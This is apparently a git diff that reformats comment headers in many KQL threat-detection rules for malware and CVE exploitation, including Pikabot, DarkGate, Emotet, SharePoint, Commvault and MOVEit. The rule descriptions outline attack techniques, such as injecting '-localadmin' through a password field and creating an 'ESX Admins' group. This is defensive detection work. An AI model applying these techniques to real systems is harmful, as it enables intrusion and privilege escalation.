--- a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
+++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2023-10-27
 // Level: high
 // Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
-The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
-
+// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
index e0ff3f49..c2d2c1bb 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
@@ -3,9 +3,8 @@
 // Date: 2021-03-03
 // Level: high
 // Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
-creation of non-standard files on disk by Exchange Server’s Unified Messaging service
-which could indicate dropping web shells or other malicious content
-
+// creation of non-standard files on disk by Exchange Server’s Unified Messaging service
+// which could indicate dropping web shells or other malicious content
 // MITRE Tactic: Execution
 // Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
index f5e23c68..1c519e6b 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-14
 // Level: high
 // Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
index 97fc683c..6153f5d8 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-14
 // Level: medium
 // Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
index a24e7133..ae1712b0 100644
--- a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
+++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
@@ -3,9 +3,8 @@
 // Date: 2023-10-15
 // Level: high
 // Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
-the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
-command-and-control server.
-
+// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+// command-and-control server.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
index 7fba0278..35f50aec 100644
--- a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
+++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
@@ -3,8 +3,7 @@
 // Date: 2022-04-22
 // Level: high
 // Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
-The ".lnk" file was delivered via phishing campaign.
-
+// The ".lnk" file was delivered via phishing campaign.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.006, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
index 17c7a2b9..142431b5 100644
--- a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
+++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-31
 // Level: high
 // Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
-This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
-
+// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
index 9b7d3ade..3c133795 100644
--- a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
+++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
@@ -3,7 +3,6 @@
 // Date: 2024-12-19
 // Level: high
 // Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
index df9d507b..383669a1 100644
--- a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-03
 // Level: high
 // Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
-The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
-
+// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
index ae1da639..65b80b63 100644
--- a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
+++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-22
 // Level: high
 // Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
-Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
-The process that loads these DLLs are very likely to be malicious.
-
+// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
+// The process that loads these DLLs are very likely to be malicious.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1129, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
index 7fd5578e..bb7a3923 100644
--- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-29
 // Level: medium
 // Description: Detects potential APT FIN7 exploitation activity as reported by Google.
-In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
-
+// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
index f4a71b7c..4d683ad4 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2022-04-25
 // Level: medium
 // Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
-As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
-
+// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
index 1e55dc25..a3e6f1d8 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
@@ -3,9 +3,8 @@
 // Date: 2022-04-17
 // Level: high
 // Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
-7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
-The command runs in a child process under the 7zFM.exe process.
-
+// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+// The command runs in a child process under the 7zFM.exe process.
 // MITRE Tactic: Execution
 // Tags: attack.execution, cve.2022-29072, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
index 8f7633e4..75b24ef8 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-25
 // Level: medium
 // Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
-As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
-
+// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
 // MITRE Tactic: Execution
 // Tags: attack.execution, cve.2024-3400, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
index c60da680..a54eeafb 100644
--- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
@@ -3,7 +3,6 @@
 // Date: 2024-04-01
 // Level: high
 // Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, cve.2024-3094, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
index 5f0c094c..e78bde86 100644
--- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
@@ -3,9 +3,8 @@
 // Date: 2024-07-29
 // Level: high
 // Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
-This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
-VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
-
+// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
+// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
 // MITRE Tactic: Execution
 // Tags: attack.execution, cve.2024-37085, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
index 097b0835..f8b17238 100644
--- a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2024-03-22
 // Level: medium
 // Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
-This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
-
+// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
index 0ce123a9..9e1f9678 100644
--- a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
@@ -3,13 +3,9 @@
 // Date: 2023-06-01
 // Level: medium
 // Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
-
-MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
-
-Hunting Opportunity
-
-Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
-
+// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
+// Hunting Opportunity
+// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
index 0e155f3c..28a6bee9 100644
--- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2025-04-28
 // Level: medium
 // Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
-which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
-
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
index 41d16930..8b541c12 100644
--- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2025-04-28
 // Level: medium
 // Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
-which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
-
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
index 7e281dd2..202c6756 100644
--- a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
+++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
@@ -3,7 +3,6 @@
 // Date: 2023-07-16
 // Level: high
 // Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
index 26f130b7..421b5713 100644
--- a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
+++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-20
 // Level: high
 // Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
-An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
-
+// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
index 40f07b02..aa0f682f 100644
--- a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
@@ -3,7 +3,6 @@
 // Date: 2024-12-09
 // Level: high
 // Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
-
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
index aacf7839..b6f58511 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
@@ -3,7 +3,6 @@
 // Date: 2022-01-14
 // Level: high
 // Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
-
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
index e660a078..e15251a5 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-07
 // Level: high
 // Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
-This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
-
+// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
index cb67a2eb..0beb7cdb 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
@@ -3,8 +3,7 @@
 // Date: 2025-07-21
 // Level: critical
 // Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
-CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
-
+// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
index 7be0e5cc..94159740 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
@@ -3,8 +3,7 @@
 // Date: 2025-07-21
 // Level: high
 // Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities.
-CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
-
+// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
index 3d5f9f76..b291ca19 100644
--- a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
+++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
@@ -3,9 +3,8 @@
 // Date: 2025-04-10
 // Level: medium
 // Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as
-CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.
-The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.
-
+// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.
+// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql
index d7a03f6f..69cf42b9 100644
--- a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql
+++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql
@@ -3,9 +3,8 @@
 // Date: 2022-01-24
 // Level: high
 // Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
-BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
-This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
-
+// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
+// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
index 408b84d2..ef2106e1 100644
--- a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
+++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-20
 // Level: high
 // Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
-This is a post-authentication step corresponding to CVE-2025-57790.
-
+// This is a post-authentication step corresponding to CVE-2025-57790.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
index 08a8e4cc..71d7f04e 100644
--- a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
+++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2020-05-13
 // Level: high
 // Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
-This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
-
+// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
index 59ae319c..8a984262 100644
--- a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
+++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
@@ -3,7 +3,6 @@
 // Date: 2024-02-21
 // Level: medium
 // Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
-
 // MITRE Tactic: Persistence
